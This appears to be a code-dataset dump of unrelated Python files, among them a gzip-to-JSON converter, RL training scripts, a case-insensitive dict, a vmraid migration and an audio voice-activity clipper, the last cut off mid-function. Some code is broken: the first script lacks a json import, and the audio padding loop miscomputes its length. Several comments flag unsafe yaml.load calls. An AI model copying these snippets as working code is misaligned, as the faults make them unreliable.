import gzip
import argparse
"""
Decompresses GZ file to JSON file
"""
def decompress_gz_to_json(gz_path, save_path):
    """Decompress a gzipped JSON file and rewrite it as pretty-printed JSON.

    :param gz_path: path of the .gz file containing UTF-8 encoded JSON.
    :param save_path: destination path for the formatted .json file.
    """
    with gzip.open(gz_path, "rt", encoding="utf-8") as f:
        decompressed = json.load(f)
    # Explicit encoding (the default is platform-dependent) and json.dump
    # streams to the file instead of materialising the whole string first.
    with open(save_path, 'w', encoding="utf-8") as f:
        json.dump(decompressed, f, indent=4, sort_keys=True)
if __name__ == "__main__":
    # Command-line front end: two required paths, nothing else.
    parser = argparse.ArgumentParser(description="Decompress GZ file to JSON file")
    parser.add_argument(
        "--gz_path", type=str, required=True, help="Location of .gz file to be decompressed"
    )
    parser.add_argument(
        "--save_path", type=str, required=True, help="Location to save file as .json"
    )
    cli_args = parser.parse_args()
    decompress_gz_to_json(cli_args.gz_path, cli_args.save_path)
| 820 | 290 |
import fixture
import nose
import requests
import os
import pprint
import time
def get_times(response):
    """
    Parse a response from a watch script to get the reported times.
    :param response: the response from a requests.get call.
    :returns: a dictionary of parsed times.
    """
    times = {}
    # Each chunk after a "Watch " marker looks like "<name> [<timestamp>]...".
    for chunk in response.content.split("Watch ")[1:]:
        name, _, remainder = chunk.partition(" [")
        times[name] = remainder.split("]")[0]
    pprint.pprint(times)
    return times
def start_tangelo():
    """Start tangelo with the watch plugin."""
    # Delegates to the shared fixture so startup stays symmetric with
    # fixture.stop_tangelo used for teardown elsewhere in this file.
    return fixture.start_tangelo("--watch")
def touch_file(path):
    """
    Use os.utime to touch a file, but add a delay to make sure things have a
    chance to change.
    :param path: path to touch.
    """
    # Sleep first so the new mtime differs from the previous one even on
    # filesystems with coarse timestamp resolution.
    time.sleep(2)
    os.utime(path, None)
@nose.with_setup(start_tangelo, fixture.stop_tangelo)
def test_watch_plugin():
    """End-to-end check that the watch plugin reloads touched scripts.

    Each request reports per-script import timestamps; touching a file must
    refresh its own timestamp and those of the scripts that import it, while
    leaving unrelated scripts untouched.
    """
    times = []
    # Check the original time
    response = requests.get(fixture.url("watch_a"))
    assert "Watch A" in response.content
    times.append(get_times(response))
    # Calling this again shouldn't change any import time.
    response = requests.get(fixture.url("watch_a"))
    times.append(get_times(response))
    assert times[-2] == times[-1]
    # Touch script A and check that we now get a new time for A, but not for
    # the sub scripts.
    touch_file("tests/web/watch_a.py")
    response = requests.get(fixture.url("watch_a"))
    times.append(get_times(response))
    assert times[-2]["A"] != times[-1]["A"]
    assert times[-2]["B"] == times[-1]["B"]
    assert times[-2]["C"] == times[-1]["C"]
    assert times[-2]["D"] == times[-1]["D"]
    # Touch script B and check that script A updates with that, too.
    touch_file("tests/web/watch_b.py")
    response = requests.get(fixture.url("watch_a"))
    times.append(get_times(response))
    assert times[-2]["A"] != times[-1]["A"]
    assert times[-2]["B"] != times[-1]["B"]
    assert times[-2]["C"] == times[-1]["C"]
    assert times[-2]["D"] == times[-1]["D"]
    # And again with script D which is several layers in
    touch_file("tests/web/watch_d.py")
    response = requests.get(fixture.url("watch_a"))
    times.append(get_times(response))
    assert times[-2]["A"] != times[-1]["A"]
    assert times[-2]["B"] != times[-1]["B"]
    assert times[-2]["C"] != times[-1]["C"]
    assert times[-2]["D"] != times[-1]["D"]
    # Touching script C and then loading E should show a new C time
    touch_file("tests/web/watch_c.py")
    response = requests.get(fixture.url("watch_e"))
    times.append(get_times(response))
    assert times[-2]["C"] != times[-1]["C"]
    assert times[-2]["D"] == times[-1]["D"]
    # Touch script B. Calling E should not show any difference in times.
    touch_file("tests/web/watch_b.py")
    response = requests.get(fixture.url("watch_e"))
    times.append(get_times(response))
    assert times[-2] == times[-1]
    # All done
| 2,981 | 1,005 |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def pathSum(self, root, sum):
        """Collect all root-to-leaf paths whose node values add up to `sum`.

        :type root: TreeNode
        :type sum: int
        :rtype: List[List[int]]  (fixed: the old docstring wrongly said bool)
        """
        ret = []
        if not root:
            return ret
        # `curr` is the path from the root to the node being visited.
        curr = [root.val]

        def dfs(root, sum):
            # A path counts only when it ends at a leaf with the target consumed.
            if sum == 0 and root.left is None and root.right is None:
                ret.append(curr[:])  # snapshot; curr keeps mutating
            for n in [root.left, root.right]:
                if n is not None:
                    curr.append(n.val)
                    dfs(n, sum - n.val)
                    curr.pop()

        dfs(root, sum - root.val)
        return ret
class Solution:
    def pathSum(self, root, sum):
        """Collect all root-to-leaf paths whose node values add up to `sum`.

        :type root: TreeNode
        :type sum: int
        :rtype: List[List[int]]
        """
        if not root:
            return []
        # Results accumulate on the class attribute (kept for compatibility);
        # it is reset at the start of every call.
        Solution.res = []

        def helper(root, sum, path):
            # BUG FIX: guard against None — the original dereferenced
            # root.left on a missing child and crashed with AttributeError
            # whenever any leaf did not match the remaining sum.
            if not root:
                return
            if not root.left and not root.right and sum == root.val:
                Solution.res.append(path + [root.val])
                return
            helper(root.left, sum - root.val, path + [root.val])
            helper(root.right, sum - root.val, path + [root.val])

        helper(root, sum, [])
        return Solution.res
#pip install tensorflow==1.15
#Install stable-baselines as described in the documentation
import sys
import model
from model import FullyConvPolicyBigMap, FullyConvPolicySmallMap, CustomPolicyBigMap, CustomPolicySmallMap
from utils import get_exp_name, max_exp_idx, load_model, make_vec_envs
from stable_baselines import PPO2
from stable_baselines.results_plotter import load_results, ts2xy
import tensorflow as tf
import numpy as np
import os
# Mutable module state shared with callback(): step counter, monitor/log
# directory, and the best mean reward observed so far.
n_steps = 0
log_dir = 'runs'
best_mean_reward, n_steps = -np.inf, 0
def callback(_locals, _globals):
    """
    Callback called at each step (for DQN an others) or after n steps (see ACER or PPO2)
    :param _locals: (dict)
    :param _globals: (dict)
    """
    global n_steps, best_mean_reward
    # Evaluate every 10 invocations (an older comment said 1000, which did
    # not match the code).
    if (n_steps + 1) % 10 == 0:
        x, y = ts2xy(load_results(log_dir), 'timesteps')
        if len(x) > 100:
            # Mean reward over the last 100 logged episodes.
            mean_reward = np.mean(y[-100:])
            print("Best mean reward: {:.2f} - Last mean reward per episode: {:.2f}".format(best_mean_reward, mean_reward))
            # New best model, we save the agent here
            if mean_reward > best_mean_reward:
                best_mean_reward = mean_reward
                print(f"Saving new best model: idx {n_steps}")
                # NOTE(review): assumes _locals['self'] exposes .model.save();
                # confirm against the stable-baselines version in use.
                _locals['self'].model.save(os.path.join(log_dir, f'best_model.pkl'))
            else:
                _locals['self'].model.save(os.path.join(log_dir, 'latest_model.pkl'))
        else:
            # Not enough episodes logged yet to evaluate.
            pass
    n_steps += 1
    # Returning False will stop training early
    return True
def main(game, representation, experiment, steps, n_cpu, render, logging, **kwargs):
    """Train (or resume) a PPO2 agent on a PCG level-design environment.

    :param game: environment family name (e.g. 'zelda', 'sokoban').
    :param representation: observation/action representation (e.g. 'wide').
    :param experiment: tag baked into the experiment/log names.
    :param steps: total training timesteps.
    :param n_cpu: number of parallel vectorized environments.
    :param render: whether rank 0 renders.
    :param logging: when True, monitor results and checkpoint via callback().
    """
    env_name = '{}-{}-v0'.format(game, representation)
    exp_name = get_exp_name(game, representation, experiment, **kwargs)
    resume = kwargs.get('resume', False)
    # Pick the policy network by representation; sokoban maps are small
    # enough to need the small variants.
    if representation == 'wide':
        policy = FullyConvPolicyBigMap
        if game == "sokoban":
            policy = FullyConvPolicySmallMap
    else:
        policy = CustomPolicyBigMap
        if game == "sokoban":
            policy = CustomPolicySmallMap
    # Per-game observation crop sizes.
    if game == "binary":
        kwargs['cropped_size'] = 28
    elif game == "zelda":
        kwargs['cropped_size'] = 22
    elif game == "sokoban":
        kwargs['cropped_size'] = 10
    n = max_exp_idx(exp_name)
    global log_dir
    # A fresh run gets the next experiment index; resuming reuses the last one.
    if not resume:
        n = n + 1
    log_dir = 'runs/{}_{}_{}'.format(exp_name, n, 'log')
    if not resume:
        os.mkdir(log_dir)
    else:
        # NOTE(review): this result is unconditionally overwritten by the
        # PPO2.load(...) calls below — confirm load_model() is still needed.
        model = load_model(log_dir)
    kwargs = {
        **kwargs,
        'render_rank': 0,
        'render': render,
    }
    # NOTE(review): used_dir is computed but never used afterwards;
    # make_vec_envs receives log_dir directly.
    used_dir = log_dir
    if not logging:
        used_dir = None
    env = make_vec_envs(env_name, representation, log_dir, n_cpu, **kwargs)
    if not resume:
        model = PPO2(policy, env, verbose=1, n_steps=16, tensorboard_log="./runs")
    else:
        # NOTE(review): hard-coded absolute checkpoint paths — these only work
        # on the original author's machine; parameterize before reuse.
        if 'orderless' in env_name:
            model = PPO2.load("/Users/matt/pcgil2/pcgil2/runs/zeldaorderless_wide_zeldaorderless_7_log/best_model.pkl")
        else:
            model = PPO2.load("/Users/matt/pcgil2/pcgil2/runs/zeldaham_wide_zeldahamm_4_log/best_model.pkl")
        model.set_env(env)
    # With logging enabled the callback handles periodic checkpointing.
    if not logging:
        model.learn(total_timesteps=int(steps), tb_log_name=exp_name)
    else:
        model.learn(total_timesteps=int(steps), tb_log_name=exp_name, callback=callback)
################################## MAIN ########################################
# Run configuration; `experiment` is baked into run and log directory names.
#game = 'zeldaham'
game = 'zeldaorderless'
representation = 'wide'
experiment = 'zeldaorderless'
# experiment = 'zeldahamm'
#steps = 1e8
steps = 1e6  # total PPO2 timesteps
render = False
logging = True  # True -> monitor results and checkpoint via callback()
# n_cpu = 50
n_cpu = 8  # number of parallel environments
kwargs = {
    'resume': True
}
if __name__ == '__main__':
    main(game, representation, experiment, steps, n_cpu, render, logging, **kwargs)
import numpy as np
import torch
from torch import nn
from torch.autograd import Variable
from copy import deepcopy
from gym.spaces import Dict
from rllab.misc.instrument import VariantGenerator
import rlkit.torch.pytorch_util as ptu
from rlkit.envs.wrappers import NormalizedBoxEnv
from rlkit.launchers.launcher_util import setup_logger, set_seed
from rlkit.envs import get_meta_env, get_meta_env_params_iters
from rlkit.envs.wrappers import ScaledMetaEnv
from rlkit.torch.sac.policies import ReparamTanhMultivariateGaussianPolicy
from rlkit.torch.networks import Mlp
from rlkit.torch.irl.few_shot_LfD_upper_bound import UpperBound
from rlkit.torch.irl.encoders.mlp_encoder import TimestepBasedEncoder, WeightShareTimestepBasedEncoder
from rlkit.torch.irl.encoders.conv_seq_encoder import ConvTrajEncoder, R2ZMap, Dc2RMap, NPEncoder
import yaml
import argparse
import importlib
import psutil
import os
from os import path
import argparse
import joblib
from time import sleep
EXPERT_LISTING_YAML_PATH = '/h/kamyar/oorl_rlkit/rlkit/torch/irl/experts.yaml'
def experiment(variant):
    """Train the few-shot LfD upper-bound model described by *variant*.

    Loads expert replay buffers listed in the experts YAML, builds the MLP
    and timestep-based trajectory encoder, then runs UpperBound training.
    Always returns 1 (success marker for the launcher).
    """
    with open(EXPERT_LISTING_YAML_PATH, 'r') as f:
        # NOTE(review): yaml.load without an explicit Loader can execute
        # arbitrary tags; prefer yaml.safe_load if this file is not trusted.
        listings = yaml.load(f.read())
    expert_dir = listings[variant['expert_name']]['exp_dir']
    specific_run = listings[variant['expert_name']]['seed_runs'][variant['expert_seed_run_idx']]
    file_to_load = path.join(expert_dir, specific_run, 'extra_data.pkl')
    extra_data = joblib.load(file_to_load)
    # this script is for the non-meta-learning airl
    train_context_buffer, train_test_buffer = extra_data['meta_train']['context'], extra_data['meta_train']['test']
    test_context_buffer, test_test_buffer = extra_data['meta_test']['context'], extra_data['meta_test']['test']
    # set up the envs
    env_specs = variant['env_specs']
    meta_train_env, meta_test_env = get_meta_env(env_specs)
    # set up the policy and training algorithm
    obs_dim = int(np.prod(meta_train_env.observation_space.spaces['obs'].shape))
    action_dim = int(np.prod(meta_train_env.action_space.shape))
    print('obs dim: %d' % obs_dim)
    print('act dim: %d' % action_dim)
    sleep(3)
    # make the disc model
    z_dim = variant['algo_params']['z_dim']
    # make the MLP: regression mode predicts the task params from z alone;
    # otherwise it scores (z, task-params) pairs with a single output.
    hidden_sizes = [variant['algo_params']['mlp_hid_dim']] * variant['algo_params']['mlp_layers']
    obs_task_params_dim = int(np.prod(meta_train_env.observation_space.spaces['obs_task_params'].shape))
    mlp = Mlp(
        hidden_sizes,
        output_size=obs_task_params_dim if variant['algo_params']['training_regression'] else 1,
        input_size=z_dim if variant['algo_params']['training_regression'] else z_dim + 2*obs_task_params_dim,
        batch_norm=variant['algo_params']['mlp_use_bn']
    )
    # Make the encoder over (s, a, s') timesteps. (Alternative WeightShare
    # and neural-process conv encoders were removed here; see repository
    # history if they are needed again.)
    encoder = TimestepBasedEncoder(
        2*obs_dim + action_dim, #(s,a,s')
        variant['algo_params']['r_dim'],
        variant['algo_params']['z_dim'],
        variant['algo_params']['enc_hid_dim'],
        variant['algo_params']['r2z_hid_dim'],
        variant['algo_params']['num_enc_layer_blocks'],
        hid_act='relu',
        use_bn=True,
        within_traj_agg=variant['algo_params']['within_traj_agg']
    )
    train_task_params_sampler, test_task_params_sampler = get_meta_env_params_iters(env_specs)
    algorithm = UpperBound(
        meta_train_env,
        train_context_buffer,
        train_test_buffer,
        test_context_buffer,
        test_test_buffer,
        mlp,
        encoder,
        **variant['algo_params']
    )
    if ptu.gpu_enabled():
        algorithm.cuda()
    algorithm.train()
    return 1
if __name__ == '__main__':
    # Arguments
    parser = argparse.ArgumentParser()
    parser.add_argument('-e', '--experiment', help='experiment specification file')
    args = parser.parse_args()
    with open(args.experiment, 'r') as spec_file:
        spec_string = spec_file.read()
    # NOTE(review): yaml.load without a Loader — prefer yaml.safe_load here.
    exp_specs = yaml.load(spec_string)
    if exp_specs['use_gpu']:
        print('\n\nUSING GPU\n\n')
        ptu.set_gpu_mode(True)
    exp_id = exp_specs['exp_id']
    exp_prefix = exp_specs['exp_name']
    seed = exp_specs['seed']
    set_seed(seed)
    # Logger must be configured before experiment() starts emitting stats.
    setup_logger(exp_prefix=exp_prefix, exp_id=exp_id, variant=exp_specs)
    experiment(exp_specs)
| 5,752 | 2,081 |
# Copyright 2012-2014 Brian May
#
# This file is part of python-tldap.
#
# python-tldap is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-tldap is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with python-tldap If not, see <http://www.gnu.org/licenses/>.
import six
import copy
class CaseInsensitiveDict(dict):
    """
    Case insensitve dictionary for searches however preserves the case for
    retrieval.

    Internally keeps ``self.lc``, a map of lower-cased key -> the
    originally-cased key currently stored in the dict.
    """

    def __init__(self, d=None):
        """Initialize from an optional mapping.

        BUG FIX: the default used to be the mutable literal ``{}`` shared by
        every call; use ``None`` and build a fresh dict per instance.
        """
        if d is None:
            d = {}
        self.lc = {}
        for k, v in six.iteritems(d):
            self.lc[k.lower()] = k
        super(CaseInsensitiveDict, self).__init__(d)

    def __setitem__(self, key, value):
        try:
            old_key = self.lc[key.lower()]
        except KeyError:
            pass
        else:
            # A differently-cased variant already exists: drop it so the
            # new spelling wins while only one entry remains.
            if key != old_key:
                super(CaseInsensitiveDict, self).__delitem__(old_key)
        self.lc[key.lower()] = key
        super(CaseInsensitiveDict, self).__setitem__(key, value)

    def __delitem__(self, key):
        # Resolve to the stored casing; raises KeyError if absent.
        key = self.lc[key.lower()]
        del self.lc[key.lower()]
        super(CaseInsensitiveDict, self).__delitem__(key)

    def __getitem__(self, key):
        key = self.lc[key.lower()]
        return super(CaseInsensitiveDict, self).__getitem__(key)

    def __contains__(self, key):
        try:
            key = self.lc[key.lower()]
        except KeyError:
            return False
        else:
            return super(CaseInsensitiveDict, self).__contains__(key)

    def get(self, key, default=None):
        try:
            key = self.lc[key.lower()]
        except KeyError:
            return default
        else:
            return super(CaseInsensitiveDict, self).get(key, default)

    def get_correct_key(self, key):
        """Return the originally-cased key for *key* (raises KeyError)."""
        return self.lc[key.lower()]

    def __copy__(self):
        # Shallow copy: values are shared, lc is rebuilt via __setitem__.
        clone = self.__class__()
        for k, v in six.iteritems(self):
            clone[k] = v
        return clone

    def __deepcopy__(self, memo):
        clone = self.__class__()
        for k, v in six.iteritems(self):
            clone[k] = copy.deepcopy(v, memo)
        return clone
| 2,535 | 801 |
import torch
__all__ = ["get", "is_external_optimizer"]
def is_external_optimizer(optimizer):
    """Return True if *optimizer* is handled outside torch; always False here."""
    return False
def get(params, optimizer, learning_rate=None, decay=None):
    """Retrieves an Optimizer instance."""
    # An already-constructed optimizer passes straight through.
    if isinstance(optimizer, torch.optim.Optimizer):
        return optimizer

    lbfgs_variants = ("L-BFGS", "L-BFGS-B")
    # L-BFGS has its own fixed lr below; every other optimizer needs one.
    if learning_rate is None and optimizer not in lbfgs_variants:
        raise ValueError("No learning rate for {}.".format(optimizer))
    if decay is not None:
        # TODO: learning rate decay
        raise NotImplementedError(
            "learning rate decay to be implemented for backend pytorch."
        )

    if optimizer == "adam":
        return torch.optim.Adam(params, lr=learning_rate)
    if optimizer in lbfgs_variants:
        # TODO: L-BFGS parameters
        return torch.optim.LBFGS(params, lr=1, max_iter=20)
    raise NotImplementedError(f"{optimizer} to be implemented for backend pytorch.")
| 933 | 299 |
from __future__ import unicode_literals
import json
import vmraid
import vmraid.defaults
from vmraid.desk.like import _toggle_like
from six import string_types
def execute():
    """Patch: convert each user's saved `_bookmarks` Form routes into likes."""
    for user in vmraid.get_all("User"):
        username = user["name"]
        bookmarks = vmraid.db.get_default("_bookmarks", username)
        if not bookmarks:
            continue
        # Stored either as a JSON string or an already-decoded list.
        if isinstance(bookmarks, string_types):
            bookmarks = json.loads(bookmarks)
        for opts in bookmarks:
            route = (opts.get("route") or "").strip("#/ ")
            if route and route.startswith("Form"):
                try:
                    view, doctype, docname = opts["route"].split("/")
                except ValueError:
                    # Route does not have exactly three segments; skip it.
                    continue
                if vmraid.db.exists(doctype, docname):
                    # Skip DocTypes themselves, single doctypes, and
                    # doctypes whose backing table is missing.
                    if (doctype=="DocType"
                        or int(vmraid.db.get_value("DocType", doctype, "issingle") or 0)
                        or not vmraid.db.table_exists(doctype)):
                        continue
                    _toggle_like(doctype, docname, add="Yes", user=username)
| 899 | 358 |
# coding=utf-8
__author__ = 'NXG'
import os, wave
import contextlib
import collections
from math import ceil
from dataprovider.create.data_management import mik_dir
saved_original_voice_path = '/data/validation_clip/'
def read_wave(path):
    """Read a mono WAV file and return (raw PCM bytes, sample rate).

    Only mono files at 8 kHz, 16 kHz or 32 kHz are accepted; the whole
    payload is pulled in a single readframes call.
    """
    with contextlib.closing(wave.open(path, 'rb')) as wav:
        channels = wav.getnchannels()
        print('voice channel is:', channels)
        assert channels == 1
        sample_width = wav.getsampwidth()
        # assert sample_width == 2
        sample_rate = wav.getframerate()
        assert sample_rate in (8000, 16000, 32000)
        pcm_data = wav.readframes(wav.getnframes())
        print('the voice length is:{} and sample_rate is:{}'.format(len(pcm_data), sample_rate))
        return pcm_data, sample_rate
def write_wave(write_path, audio, sample_rate):
    """Write raw PCM *audio* to *write_path* as a 16-bit mono WAV file.

    :param write_path: destination .wav path.
    :param audio: raw PCM frames (bytes).
    :param sample_rate: frames per second for the output file.
    """
    print('write path:', (write_path, sample_rate))
    # Context manager guarantees the file is closed even if writing fails
    # (the original leaked the handle on any exception).
    with wave.open(write_path, 'wb') as wf:
        wf.setnchannels(1)
        wf.setsampwidth(2)
        wf.setframerate(sample_rate)
        wf.writeframes(audio)
class Frame(object):
    """A fixed-length slice of PCM audio with its position in the stream."""

    def __init__(self, bytes, timestamp, duration):
        # `bytes` shadows the builtin name but is kept for compatibility.
        self.bytes = bytes
        self.timestamp = timestamp
        self.duration = duration


def frame_collect(frame_duration_ms, audio, sample_rate):
    """Chop raw 16-bit mono PCM into Frames of frame_duration_ms each.

    Trailing bytes that do not fill a complete frame are discarded.
    """
    frame_segment = []
    # Bytes per frame: samples-per-frame times 2 bytes per 16-bit sample.
    n = int(sample_rate * (frame_duration_ms / 1000.0) * 2)
    duration = (float(n) / sample_rate) / 2.0
    timestamp = 0.0
    for start in range(0, len(audio) - n, n):
        frame_segment.append(Frame(audio[start:start + n], timestamp, duration))
        timestamp += duration
    print('collect all frams:', len(frame_segment))
    return frame_segment
def vad_check(sample_rate, frame_duration_ms, padding_duration_ms, frames, write_path):
    """Accumulate frames and, if enough audio is present, write it to disk.

    Returns False when the collected audio is too short to count as human
    voice, True after writing the (possibly padded) audio to write_path.
    """
    # Buffer holds at most padding_duration_ms worth of frames.
    num_padding_frames = int(padding_duration_ms // frame_duration_ms)
    ring_buffer = collections.deque(maxlen=num_padding_frames)
    for index_, frame in enumerate(frames):
        ring_buffer.append(frame)
    human_voiced = b''.join([seg.bytes for seg in ring_buffer])
    human_voiced_len = len(human_voiced)
    # 16000 bytes == 1 s of 16-bit mono audio at 8 kHz (the original
    # comments describe these thresholds as 0.5 s / [0.5 s, 1 s] — TODO
    # confirm which sample rate the thresholds were tuned for).
    if human_voiced_len < 16000:
        ring_buffer.clear()
        return False  # not human voice
    else:
        if human_voiced_len < 16000 * 6:
            full_human_voice_length = 16000 * 6
            copy_num = ceil(full_human_voice_length / human_voiced_len)
            for copy_step in range(0, copy_num, 1):
                # NOTE(review): this doubles the buffer each pass, so the
                # result grows to len * 2**copy_num — far beyond the target
                # length. Likely meant to append the ORIGINAL clip copy_num
                # times; confirm before relying on the output length.
                human_voiced = human_voiced.__add__(human_voiced)  # Modify here
        write_wave(write_path, human_voiced, sample_rate)
        return True
def check(*path):
    """Run VAD over one audio file and report whether voice was kept.

    NOTE(review): positional contract is check(<unused>, src_path, dst_path);
    path[0] is never read — confirm with callers before changing.
    """
    audio, sample_rate = read_wave(path[1])  # read the wav format voice data
    frames = frame_collect(30, audio, sample_rate)
    frames = list(frames)
    # Padding window spans the whole clip: len(frames) * 30 ms.
    segments = vad_check(sample_rate, 30, len(frames) * 30, frames, path[2])
    print('segments:', segments)
    return segments
# Is the audio stream shorter than 3 seconds?
if __name__ == '__main__':
    path = 'D:/save'
    # BUG FIX: the drive separator was written as 'D"' which is not a valid
    # Windows path. (Directory name 'enrance_voice' kept as-is: it may be
    # the actual on-disk name.)
    save_path_root = 'D:/enrance_voice'
    dir_path = os.listdir(path)
    for cur_path in dir_path:
        name = os.listdir(os.path.join(path, cur_path))
        for base_name in name:
            # Full path of the source audio file.
            src_name = os.path.join(path, cur_path, base_name)
            # BUG FIX: the destination used to be built from the already
            # joined source path, producing a nonsense save location; join
            # the bare file name under save_path_root instead.
            save_name = os.path.join(save_path_root, cur_path, base_name)
            check(3, src_name, save_name)
| 4,061 | 1,473 |
from AlignmentPracticableRepa import *
import logging
from timeit import default_timer as timer
from sys import stdout
# logging.basicConfig(format='%(asctime)s : %(name)s : %(message)s', datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)
# logging.basicConfig(format='%(message)s', level=logging.INFO)
logging.basicConfig(format='%(message)s')

# One named logger per pipeline stage, all at INFO.
layerer_log, tupler_log, parter_log, roller_log, applier_log, dervarser_log, decomper_log = (
    logging.getLogger(stage)
    for stage in ('layerer', 'tupler', 'parter', 'roller', 'applier', 'dervarser', 'decomper')
)
for _stage_log in (layerer_log, tupler_log, parter_log, roller_log,
                   applier_log, dervarser_log, decomper_log):
    _stage_log.setLevel(logging.INFO)
# parametersSystemsLayererMaxRollByMExcludedSelfHighestIORepa_u ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# System -> Set.Set Variable -> HistoryRepa -> HistogramRepaRed -> HistoryRepa -> HistogramRepaRed -> Integer ->
# IO (System, Fud, [(Set.Set Variable, Double)])
def parametersSystemsLayererMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vv,xx,xxp,xxrr,xxrrp,f):
    """Layered fud induction: repeatedly tuple/partition/roll/apply until the
    derived-variable alignment stops improving or lmax layers are reached.

    Returns (system, fud, [(derived-var set, alignment)]) as in the Haskell
    original whose type signature is quoted in the comment above.
    """
    # Tolerance for comparing floating-point alignments between layers.
    repaRounding = 1e-6
    def sgl(x):
        return sset([x])
    def maxr(mm):
        # Highest alignment value in mm, or 0 when mm is empty.
        if len(mm) > 0:
            return list(sset([b for (_,b) in mm]))[-1:][0]
        return 0
    # Short aliases mirroring the Haskell names of the underlying library.
    uvars = systemsSetVar
    cart = systemsSetVarsSetStateCartesian_u
    lluu = listsSystem_u
    uunion = pairSystemsUnion
    sunion = pairStatesUnionLeft
    ssgl = stateSingleton
    llaa = listsHistogram_u
    hhvvr = historyRepasVectorVar
    apvvr = histogramRepaRedsVectorVar
    hrhx = historyRepasRed
    def unit(qq):
        return llaa([(ss,1) for ss in qq])
    tttr = systemsTransformsTransformRepa_u
    apply = historyRepasListTransformRepasApply_u
    trans = histogramsSetVarsTransform_u
    ttpp = transformsPartition
    und = transformsUnderlying
    qqff = setTransformsFud_u
    ffqq = fudsSetTransform
    def funion(ff,gg):
        return qqff(ffqq(ff) | ffqq(gg))
    def buildfftup(uu,vv,ff,hh,hhp,hhrr,hhrrp):
        # Tuple search over the current fud.
        return parametersSystemsBuilderTupleNoSumlayerMultiEffectiveRepa_ui(xmax,omax,bmax,mmax,uu,vv,ff,hh,hhp,hhrr,hhrrp)
    def parter(uu,kk,bb,y1):
        # Partition search for one tuple.
        return parametersSystemsPartitionerMaxRollByMRepa_ui(mmax,umax,pmax,uu,kk,bb,y1)
    def roller(qq):
        return parametersRollerMaximumRollExcludedSelfRepa_i(qq)
    def buildffdervar(uu,vv,ff,xx,xxp,xxrr,xxrrp):
        # Derived-variable search; keep only (varset, alignment) pairs.
        (x1,s1) = parametersSystemsBuilderDerivedVarsHighestNoSumlayerRepa_ui(wmax,omax,uu,vv,ff,xx,xxp,xxrr,xxrrp)
        return ([(kk,a) for ((kk,_,_),a) in x1],s1)
    def layer(vv,uu,ff,mm,xx,xxp,xxrr,xxrrp,f,l):
        # One induction layer; recurses while alignment keeps improving.
        if l > lmax:
            return (uu,ff,mm)
        layerer_log.info(">>> layer\tfud: %d\tlayer: %d" % (f,l))
        t1 = timer()
        # --- tuple search -----------------------------------------------
        tupler_log.info(">>> tupler")
        tupler_log.info("substrate cardinality: %d" % len(vv))
        tupler_log.info("fud cardinality: %d" % len(ffqq(ff)))
        stdout.flush()
        (x2,s2) = buildfftup(uu,vv,ff,xx,xxp,xxrr,xxrrp)
        if len(x2) > 0:
            tupler_log.info("tuple cardinality: %d" % len(x2))
            tupler_log.info("max tuple algn: %.2f" % max([b for (a,b) in x2]))
        else:
            tupler_log.info("no tuples")
        t2 = timer()
        tupler_log.info("tupler\tsearched: %d\trate: %.2f" % (s2,s2/(t2-t1)))
        tupler_log.info("<<< tupler %.3fs" % (t2-t1))
        # --- partitioner ------------------------------------------------
        parter_log.info(">>> parter")
        stdout.flush()
        y3 = [parter(uu,kk,bb,y1) for ((kk,bb),y1) in x2]
        x3 = [x for (ll,_) in y3 for x in ll]
        s3 = sum([s for (_,s) in y3])
        if len(x3) > 0:
            parter_log.info("partitions cardinality: %d" % len(x3))
        else:
            parter_log.info("no tuple partitions")
        t3 = timer()
        parter_log.info("parter\tsearched: %d\trate: %.2f" % (s3,s3/(t3-t2)))
        parter_log.info("<<< parter %.3fs" % (t3-t2))
        # --- roller -----------------------------------------------------
        roller_log.info(">>> roller")
        stdout.flush()
        y4 = [roller(qq) for qq in x3]
        x4 = [x for (ll,_) in y4 for x in ll]
        s4 = sum([s for (_,s) in y4])
        if len(x4) > 0:
            roller_log.info("roll cardinality: %d" % len(x4))
        else:
            roller_log.info("no rolls")
        t4 = timer()
        roller_log.info("roller\tsearched: %d\trate: %.2f" % (s4,s4/(t4-t3)))
        roller_log.info("<<< roller %.3fs" % (t4-t3))
        # --- application: turn non-trivial rolls into new transforms ----
        applier_log.info(">>> application")
        stdout.flush()
        ll0 = []
        for (yy,pp) in x4:
            for (jj,p) in zip(yy,pp):
                # Keep only rolls that actually merge values.
                if max(p) + 1 < len(p):
                    ii = list(zip(cart(uu,jj),p))
                    ll0.append(ii)
        ll = []
        for (b,ii) in enumerate(ll0):
            # Fresh derived variable named by (fud, layer, index).
            w = VarPair((VarPair((VarInt(f),VarInt(l))),VarInt(b+1)))
            ww = sset([ValInt(u) for (_,u) in ii])
            tt = trans(unit([sunion(ss,ssgl(w,ValInt(u))) for (ss,u) in ii]),sgl(w))
            ll.append((tt,(w,ww)))
        ll1 = []
        for (tt,(w,ww)) in ll:
            # Drop transforms duplicating an earlier one (same underlying
            # variables, same partition, equal value cardinality).
            if all([len(ww) != len(ww1) or und(tt) != und(tt1) or ttpp(tt) != ttpp(tt1) for (tt1,(w1,ww1)) in ll if w > w1]):
                ll1.append((tt,(w,ww)))
        if len(ll1) > 0:
            hh = qqff(sset([tt for (tt,_) in ll1]))
            uu1 = uunion(uu,lluu([(w,ww) for (_,(w,ww)) in ll1]))
            ffr = [tttr(uu1,tt) for (tt,_) in ll1]
            # Apply the new transforms to history and shuffle alike.
            xx1 = apply(xx,ffr)
            xxp1 = hrhx(xx1)
            xxrr1 = apply(xxrr,ffr)
            xxrrp1 = hrhx(xxrr1)
            gg = funion(ff,hh)
            applier_log.info("fud cardinality: %d" % len(ffqq(gg)))
            t5 = timer()
            applier_log.info("<<< application %.3fs" % (t5-t4))
            # --- derived-variable search --------------------------------
            dervarser_log.info( ">>> dervarser")
            stdout.flush()
            (mm1,s5) = buildffdervar(uu1,vv,gg,xx1,xxp1,xxrr1,xxrrp1)
            if len(mm1) > 0:
                dervarser_log.info("der vars algn density: %.2f" % maxr(mm1))
            else:
                dervarser_log.info("no der vars sets")
